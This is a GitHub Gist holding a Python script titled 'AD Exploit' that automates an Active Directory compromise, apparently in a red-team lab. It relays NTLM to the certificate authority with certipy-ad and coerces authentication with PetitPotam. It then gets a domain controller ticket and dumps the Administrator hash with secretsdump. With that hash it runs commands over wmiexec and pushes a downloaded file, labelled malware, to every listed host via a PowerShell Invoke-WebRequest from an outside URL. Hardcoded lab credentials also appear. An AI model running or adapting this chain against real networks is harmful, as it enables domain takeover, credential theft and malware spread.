Last active
May 14, 2025 10:03
-
-
Save CX330Blake/4c9b3f5c9840e29359894d8fb1da3493 to your computer and use it in GitHub Desktop.
AD Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| import ipaddress | |
| from time import sleep | |
| import os | |
| import argparse | |
| env = os.environ.copy() | |
| def info(s, *rest): | |
| print(f"\033[92m{s}", *rest, "\033[0m") | |
| def alert(s, *rest): | |
| print(f"\033[91m{s}", *rest, "\033[0m") | |
| def is_valid_ip(ip): | |
| try: | |
| ipaddress.ip_address(ip) | |
| return True | |
| except: | |
| return False | |
| def sync_time(domain_name): | |
| sudo_password = "kali" | |
| try: | |
| result = subprocess.run( | |
| ["sudo", "ntpdate", domain_name], sudo_password) | |
| info("Stdout: ", result.stdout) | |
| except Exception as e: | |
| alert("Error syncing time with AD:", e) | |
| exit(1) | |
| def certipy_ad(ca_domain_name): | |
| info("[+] CA domain name:", ca_domain_name) | |
| try: | |
| proc = subprocess.Popen( | |
| [ | |
| "certipy-ad", "relay", | |
| "-target", f"http://{ca_domain_name}", | |
| "-template", "DomainController" | |
| ], | |
| stdout=subprocess.PIPE, | |
| stderr=subprocess.PIPE, | |
| text=True, | |
| cwd="./" | |
| ) | |
| info("[+] certipy-ad relay listener started") | |
| # for _ in range(5): | |
| # line = proc.stdout.readline() | |
| # if line: | |
| # print(line.strip()) | |
| # else: | |
| # break | |
| return proc | |
| except Exception as e: | |
| alert("Error running certipy-ad:", e) | |
| exit(1) | |
| def petit_potam(attacker_ip, target_ip, domain_user_username, domain_user_password, domain_name): | |
| if not is_valid_ip(attacker_ip) or not is_valid_ip(target_ip): | |
| alert("Invalid attacker IP or target IP") | |
| exit(1) | |
| try: | |
| result = subprocess.run(['python', 'PetitPotam.py', "-u", domain_user_username, "-p", | |
| domain_user_password, "-d", domain_name, "-dc-ip", domain_name, attacker_ip, target_ip], capture_output=True, text=True) | |
| print("Stdout:", result.stdout) | |
| except: | |
| alert("Error running PetitPotam.py") | |
| exit(1) | |
| def get_tgt(target_ip, domain_name): | |
| try: | |
| result = subprocess.run(["certipy-ad", "auth", "-pfx", "dc.pfx", "-dc-ip", target_ip, | |
| "-domain", domain_name, "-username", "DC$"], capture_output=True, text=True) | |
| print("Stdout:", result.stdout) | |
| except Exception as e: | |
| alert("Error getting TGT:", e) | |
| exit(1) | |
| def get_hash(domain_name, dc_domain_name): | |
| try: | |
| result = subprocess.run(["impacket-secretsdump", "-k", "-just-dc-user", "Administrator", "-no-pass", f"{ | |
| domain_name}/dc\\$@{dc_domain_name}"], capture_output=True, text=True, env=env) | |
| print("Stdout:", result.stdout) | |
| hash = result.stdout.split(":::")[0].split(":")[-2:] | |
| info(f"Hash: {hash}") | |
| return ":".join(hash) | |
| except Exception as e: | |
| alert("Error getting hash:", e) | |
| exit(1) | |
| def exec_single_cmd(hash, domain_name, dc_domain_name, cmd): | |
| try: | |
| result = subprocess.run(["impacket-wmiexec", "-hashes", hash, f"{ | |
| domain_name}/Administrator@{dc_domain_name}", cmd], capture_output=True, text=True) | |
| output = result.stdout.split("[*] SMBv3.0 dialect used")[-1] | |
| print(f"{output}") | |
| except Exception as e: | |
| alert("Error executing command:", e) | |
| exit(1) | |
| def exec_cmds(hash, domain_name, dc_domain_name, cmds: list[str]): | |
| try: | |
| for c in cmds: | |
| result = subprocess.run(["impacket-wmiexec", "-hashes", hash, f"{ | |
| domain_name}/Administrator@{dc_domain_name}", c], capture_output=True, text=True) | |
| # output = result.stdout.split("\n")[-3] | |
| output = result.stdout | |
| info(f"> {c}") | |
| print(f"{output}") | |
| except Exception as e: | |
| alert("Error executing command:", e) | |
| exit(1) | |
| # def generate_targets_from_ad(username, password, domain_name, target_ip): | |
| # info("[*] Generating targets.txt from Active Directory...") | |
| # csv_output = "ad_computers.csv" | |
| # try: | |
| # subprocess.run([ | |
| # "impacket-GetADComputers", | |
| # f"{domain_name}/{username}:{password}@{target_ip}", | |
| # "-dc-ip", target_ip | |
| # ], check=True) | |
| # | |
| # with open(csv_output) as f: | |
| # lines = f.readlines()[1:] # Skip header | |
| # with open("targets.txt", "w") as out: | |
| # for line in lines: | |
| # name = line.split(",")[0].strip() | |
| # fqdn = f"{name}.{domain_name}" | |
| # out.write(fqdn + "\n") | |
| # | |
| # info("[+] targets.txt generated!") | |
| # | |
| # except Exception as e: | |
| # alert("Error generating targets:", e) | |
| # exit(1) | |
| def distribute_malware(hash, domain_name, dc_domain_name, filepath_url, filename): | |
| with open("targets.txt") as f: | |
| targets = [line.strip() for line in f if line.strip()] | |
| for target in targets: | |
| info(f"[+] Sending malware to {target}...") | |
| cmd = f"powershell -Command \"Invoke-WebRequest { | |
| filepath_url} -OutFile C:\\Windows\\Temp\\{filename}\"" | |
| try: | |
| result = subprocess.run(["impacket-wmiexec", "-hashes", hash, | |
| f"{domain_name}/Administrator@{target}", cmd], | |
| capture_output=True, text=True) | |
| print(result.stdout) | |
| info(f"[+] successfully send malware to {target}") | |
| except Exception as e: | |
| alert("[-] Failed to send malware:", e) | |
| def main(): | |
| parser = argparse.ArgumentParser( | |
| description="Certipy + PetitPotam attacking script") | |
| parser.add_argument("-i", "--interactive", | |
| action="store_true", help="Run in interactive mode") | |
| args = parser.parse_args() | |
| attacker_ip = "172.18.0.200" | |
| target_ip = "172.18.0.100" | |
| domain_user_username = "pxe" | |
| domain_user_password = "B00table1234!" | |
| domain_name = "x-team.blue" | |
| ca_domain_name = f"ca.{domain_name}" | |
| dc_domain_name = f"dc.{domain_name}" | |
| filepath_url = "https://blog.cx330.tw/assets/Resume.pdf" | |
| filename = "resume.pdf" | |
| cmds = [ | |
| "whoami", | |
| "dir", | |
| "ipconfig", | |
| ] | |
| certipy_proc = certipy_ad(ca_domain_name) | |
| info("[+] Wait for PetitPotam to start...") | |
| sleep(5) | |
| petit_potam( | |
| attacker_ip, | |
| target_ip, | |
| domain_user_username, | |
| domain_user_password, | |
| domain_name | |
| ) | |
| info("[+] Wait for certificate...") | |
| sleep(5) | |
| if certipy_proc: | |
| certipy_proc.terminate() | |
| print("[+] certipy-ad listener terminated") | |
| if os.path.exists("dc.pfx"): | |
| print("[+] dc.pfx found!") | |
| else: | |
| alert("[-] dc.pfx NOT found!") | |
| exit(1) | |
| get_tgt(target_ip, domain_name) | |
| if os.path.exists("dc.ccache"): | |
| env["KRB5CCNAME"] = "./dc.ccache" | |
| print("[+] TGT session exported") | |
| else: | |
| alert("[-] No dc.ccache found :(") | |
| exit(1) | |
| print(env["KRB5CCNAME"]) | |
| # time.sleep(5) | |
| hash = get_hash(domain_name, dc_domain_name) | |
| if args.interactive: | |
| while True: | |
| cmd = input("Cmd> ") | |
| if cmd == "exit": | |
| break | |
| exec_single_cmd(hash, domain_name, dc_domain_name, cmd=cmd) | |
| else: | |
| exec_cmds(hash, domain_name, dc_domain_name, cmds=cmds) | |
| # generate_targets_from_ad(domain_user_username, | |
| # domain_user_password, domain_name, target_ip) | |
| info("[+] Start distrubuting malwares") | |
| distribute_malware(hash, domain_name, dc_domain_name, | |
| filepath_url, filename) | |
| info("[+] Malware distributed successfully!") | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment